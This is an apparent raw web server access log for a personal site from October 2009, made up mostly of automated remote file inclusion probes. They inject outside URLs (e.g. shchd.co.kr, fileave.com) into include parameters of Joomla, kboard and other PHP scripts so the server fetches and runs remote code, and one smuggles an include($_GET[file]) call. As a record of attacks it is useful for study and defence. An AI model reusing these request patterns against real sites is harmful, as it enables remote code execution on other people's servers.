94.236.23.242 - - [30/Oct/2009:10:36:40 -0700] "GET /logs/access_080526.log%20%20/send_reminders.php?includedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:37:44 -0700] "GET /logs/access_080523.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:37:59 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:37:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:37:59 -0700] "GET /logs/access_081007.log//skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:10:38:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:10:38:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:10:38:38 -0700] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:10:38:54 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:10:38:54 -0700] "GET /logs/access_081111.log//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:10:38:54 -0700] "GET /kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.13.180.28 - - [30/Oct/2009:10:39:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.180.28 - - [30/Oct/2009:10:39:21 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.180.28 - - [30/Oct/2009:10:39:21 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.180.28 - - [30/Oct/2009:10:39:22 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
218.219.147.58 - - [30/Oct/2009:10:39:34 -0700] "GET /logs/access_080818.log/index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:39:51 -0700] "GET /logs/access_081111.log//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:39:51 -0700] "GET /kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:39:53 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:10:40:05 -0700] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:05 -0700] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:08 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.165 - - [30/Oct/2009:10:41:13 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.68.165 - - [30/Oct/2009:10:41:13 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/thumbs/thumbs_051.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
218.149.84.14 - - [30/Oct/2009:10:41:27 -0700] "GET /?INCLUDE_FOLDER=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 16041 "-" "libwww-perl/5.79" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:28 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:28 -0700] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:28 -0700] "GET /logs/access_090219.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:41:29 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15975 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:41:29 -0700] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:41:29 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:41:29 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:10:41:35 -0700] "GET /logs/access_090204.log%20//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:41:39 -0700] "GET /logs/access_090525.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.42.221.130 - - [30/Oct/2009:10:41:53 -0700] "GET /errors.php?error=http://r5f5i5.nm.ru/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
64.35.133.99 - - [30/Oct/2009:10:42:00 -0700] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:42:10 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:42:10 -0700] "GET /logs/access_080912.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:42:10 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:42:12 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:42:12 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:42:12 -0700] "GET /logs/access_080523.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:42:20 -0700] "GET /logs/access_090525.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:10:42:25 -0700] "GET /logs/access_090721.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:42:54 -0700] "GET /logs//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:42:54 -0700] "GET /logs/access_081230.log%20%20//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:42:54 -0700] "GET /board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [30/Oct/2009:10:43:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [30/Oct/2009:10:43:15 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:13 -0700] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:22 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:23 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:44:23 -0700] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:45:03 -0700] "GET /bikes/dteel/2008_07_20/?N=A HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:10:45:12 -0700] "GET /appserv/main.php?appserv_root=http://teamhack.pcriot.com/alat/copyright??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:10:45:34 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:10:45:34 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:10:45:34 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:10:45:48 -0700] "GET /logs/access_090721.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.167.62.165 - - [30/Oct/2009:10:46:04 -0700] "GET /mobileoffice/?S=A HTTP/1.1" 200 5024 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
222.117.124.136 - - [30/Oct/2009:10:46:10 -0700] "GET /?INCLUDE_FOLDER=http://www.e-kalamaria.gr/panodimousm.jpg? HTTP/1.1" 200 16046 "-" "libwww-perl/5.805" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:46:11 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:46:11 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:46:11 -0700] "GET /logs/access_080523.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:46:14 -0700] "GET /logs//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:46:14 -0700] "GET /logs/access_081230.log%20%20//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:46:14 -0700] "GET /board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:14 -0700] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:16 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:16 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:16 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:16 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:16 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:23 -0700] "GET /logs/access_080518.log//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:46:24 -0700] "GET /logs/access_080518.log//include/admin.lib.inc.php?site_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:46:28 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:33 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:46:36 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:46:50 -0700] "GET /logs/access_090204.log%20//kboard/kboard.php?board=free&act=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:47:06 -0700] "GET /logs/access_080606.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:47:13 -0700] "GET /logs/access_080606.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:47:18 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:47:18 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:47:18 -0700] "GET /logs/access_090215.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [30/Oct/2009:10:47:18 -0700] "GET /logs/access_081128.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:21 -0700] "GET ///skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:21 -0700] "GET /logs/access_081230.log////skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:21 -0700] "GET /logs////skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:36 -0700] "GET ///skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:36 -0700] "GET /logs////skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [30/Oct/2009:10:47:36 -0700] "GET /logs/access_081230.log////skin/happycast_category_lightblack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:47:37 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:47:37 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:47:38 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15967 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:47:41 -0700] "GET /logs/access_080228.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:11 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /logs/access_090421.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
